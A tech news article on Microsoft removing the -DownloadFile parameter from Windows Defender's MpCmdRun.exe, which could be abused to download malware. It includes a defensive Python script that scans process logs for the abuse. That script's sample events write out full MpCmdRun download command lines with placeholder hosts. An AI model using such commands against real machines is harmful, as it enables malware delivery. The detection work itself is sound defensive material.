Windows Defender Removes the File Download Feature

A few weeks ago, Microsoft introduced a function in its Windows Defender antivirus that security experts distrusted from the very first moment: the possibility of downloading files directly from the antivirus. Microsoft claimed that the function was secure, while all kinds of researchers have been proving otherwise. An attacker could take advantage of this feature to deliver malicious software to any computer remotely. Microsoft has therefore finally decided to remove this function from its antivirus, at least for now.

One of the techniques hackers use most to attack all types of computers is known as LOLBIN. It consists of taking advantage of legitimate operating system programs, such as Finger or Windows Defender’s MpCmdRun tool, to carry out illegal activities such as stealing data or delivering malware.

The new Windows Defender download feature came as the -DownloadFile parameter of the MpCmdRun.exe program. Given any URL and a path where the file should be saved, the executable would download the file and save it on the computer.

It is very easy to use this command to download ransomware and Trojans. It is enough to execute a CMD command in a script or in a Word macro and our PC will already be compromised. And although the antivirus should detect the threat if it is active, the tool is part of Windows itself, so the system and other security programs may not treat it as suspicious. That, in the end, is when our PC is put in danger.
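For defenders, the behaviour described above is straightforward to hunt for in process-creation logs. The following Python sketch is an added example, not code from Microsoft or from this article; the event field names, hosts, URLs and the parent-process list are assumptions, and the sample records are constructed.

```python
import ntpath
import re

# Switch named in the article; matching it case-insensitively is a defensive assumption.
DOWNLOAD_SWITCH = re.compile(r'(?<![\w-])-DownloadFile\b', re.IGNORECASE)
URL = re.compile(r'https?://[^\s"\']+', re.IGNORECASE)
# Parents that fit the article's "script or Word macro" scenario (illustrative list).
SCRIPT_PARENTS = {"winword.exe", "excel.exe", "wscript.exe", "cscript.exe",
                  "cmd.exe", "powershell.exe"}
MPCMDRUN = r"C:\Program Files\Windows Defender\MpCmdRun.exe"

# Constructed process-creation records; hosts and URLs are placeholders.
SAMPLE_EVENTS = [
    {"host": "WS-014", "image": MPCMDRUN,
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'"MpCmdRun.exe" -DownloadFile -url https://files.example.invalid/update.bin -path C:\Users\Public\update.bin'},
    {"host": "WS-021", "image": MPCMDRUN.upper(),
     "parent": r"C:\Windows\System32\services.exe",
     "cmdline": r'mpcmdrun.exe -downloadfile -url http://203.0.113.7/p.dat -path C:\Temp\p.dat'},
    {"host": "WS-014", "image": MPCMDRUN,
     "parent": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "cmdline": r'"MpCmdRun.exe" -SignatureUpdate'},
    {"host": "WS-030", "image": r"C:\Windows\System32\curl.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'curl.exe https://portal.example.invalid/api/-DownloadFile?id=7'},
]

def classify(event):
    """Return a finding if MpCmdRun.exe was started with the download switch, else None."""
    if ntpath.basename(event["image"]).lower() != "mpcmdrun.exe":
        return None  # the string may appear in other tools' URLs; only this binary counts
    if not DOWNLOAD_SWITCH.search(event["cmdline"]):
        return None  # routine use such as signature updates
    url = URL.search(event["cmdline"])
    parent = ntpath.basename(event["parent"]).lower()
    return {"host": event["host"], "parent": parent,
            "url": url.group(0) if url else None,
            "severity": "high" if parent in SCRIPT_PARENTS else "medium"}

def hunt(events):
    """Classify every event and keep only the findings."""
    return [f for f in map(classify, events) if f]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

A copy of the binary that has been renamed would not match on the image name, so this check complements rather than replaces the antivirus update.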

Windows Defender no longer lets you download files

A few hours ago, Microsoft released a new silent update for its antivirus, 4.18.2009.2-0. What this version does is remove the possibility of using MpCmdRun.exe to download files. In other words, the DownloadFile parameter has been removed from the tool.

We do not need to do anything. The antivirus updates automatically on every computer where it is active, so as of a few hours ago no computer can use this LOLBIN to download malicious software. Users who have not yet connected to the Internet will download the new version of the antivirus as soon as they connect.

Does it make sense to download files from an antivirus?

We don’t know why Microsoft decided to release this feature. Windows Defender already has its own download and update engine, in addition to its system for sending samples of the dangerous files it detects. Therefore, there is no need for a parameter, in one of the antivirus executables, that allows files to be downloaded from the Internet.

We don’t know why Microsoft chose to include this feature. Maybe it was preparing something else. Or maybe it just wanted to add totally absurd, unnecessary and dangerous features to its security software. But, be that as it may, an antivirus does not need any component that allows downloading files. The simpler this type of software is, the better. The important thing is that it protects us properly.